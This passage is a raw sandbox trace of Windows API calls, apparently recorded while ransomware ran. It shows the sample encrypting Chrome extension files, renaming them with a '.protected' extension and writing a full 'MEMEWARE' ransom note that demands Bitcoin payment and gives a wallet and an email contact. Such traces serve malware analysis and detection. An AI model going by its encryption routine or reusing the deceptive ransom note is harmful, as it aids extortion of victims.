lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.243] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.243] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.243] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.243] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.243] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.243] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.243] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\..") returned 145 [0079.243] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.243] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.243] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.244] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.244] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.244] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.244] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.244] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.244] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json") returned 156 [0079.244] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.244] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.244] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.244] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json") returned 156 [0079.245] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json") returned 156 [0079.245] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json") returned 156 [0079.245] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.245] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x149, lpOverlapped=0x0) returned 1 [0079.246] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.246] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x149, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x149, lpOverlapped=0x0) returned 1 [0079.246] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.246] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.246] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.246] CloseHandle (hObject=0x168) returned 1 [0079.246] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.protected") returned 166 [0079.246] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.protected")) returned 1 [0079.247] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.247] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.247] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\RESTORE_FILES.txt") returned 160 [0079.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.247] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.248] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.248] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.248] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.248] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.248] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.249] CloseHandle (hObject=0x164) returned 1 [0079.249] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.249] lstrcmpiW (lpString1="en_GB", lpString2="Windows") returned -1 [0079.249] lstrcmpiW (lpString1="en_GB", lpString2="Program Files") returned -1 [0079.249] lstrcmpiW (lpString1="en_GB", lpString2="Program Files (x86)") returned -1 [0079.249] lstrcmpiW (lpString1="en_GB", lpString2="$Recycle.bin") returned 1 [0079.249] lstrcmpiW (lpString1="en_GB", lpString2="System Volume Information") returned -1 [0079.249] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB") returned 145 [0079.249] lstrcmpW (lpString1="en_GB", lpString2=".") returned 1 [0079.249] lstrcmpW (lpString1="en_GB", lpString2="..") returned 1 [0079.249] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\*") returned 147 [0079.249] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.249] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.249] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.249] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.249] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.249] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.249] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\.") returned 147 [0079.249] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.249] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.250] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.250] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.250] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.250] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.250] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.250] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\..") returned 148 [0079.250] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.250] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.250] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.250] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.250] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.250] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.250] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.250] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.250] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json") returned 159 [0079.250] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.250] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.250] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.250] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json") returned 159 [0079.251] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json") returned 159 [0079.251] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json") returned 159 [0079.251] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.251] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0079.252] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.252] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0079.252] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.252] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.252] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.252] CloseHandle (hObject=0x168) returned 1 [0079.253] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.protected") returned 169 [0079.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json.protected")) returned 1 [0079.253] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.253] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.253] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\RESTORE_FILES.txt") returned 163 [0079.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.254] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.254] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.255] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.255] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.255] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.255] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.255] CloseHandle (hObject=0x164) returned 1 [0079.255] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.255] lstrcmpiW (lpString1="en_US", lpString2="Windows") returned -1 [0079.255] lstrcmpiW (lpString1="en_US", lpString2="Program Files") returned -1 [0079.255] lstrcmpiW (lpString1="en_US", lpString2="Program Files (x86)") returned -1 [0079.255] lstrcmpiW (lpString1="en_US", lpString2="$Recycle.bin") returned 1 [0079.255] lstrcmpiW (lpString1="en_US", lpString2="System Volume Information") returned -1 [0079.255] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US") returned 145 [0079.255] lstrcmpW (lpString1="en_US", lpString2=".") returned 1 [0079.255] lstrcmpW (lpString1="en_US", lpString2="..") returned 1 [0079.255] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\*") returned 147 [0079.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.256] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.256] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.256] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.256] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.256] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.256] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\.") returned 147 [0079.256] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.256] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.256] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.256] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.256] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.256] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.256] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.256] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 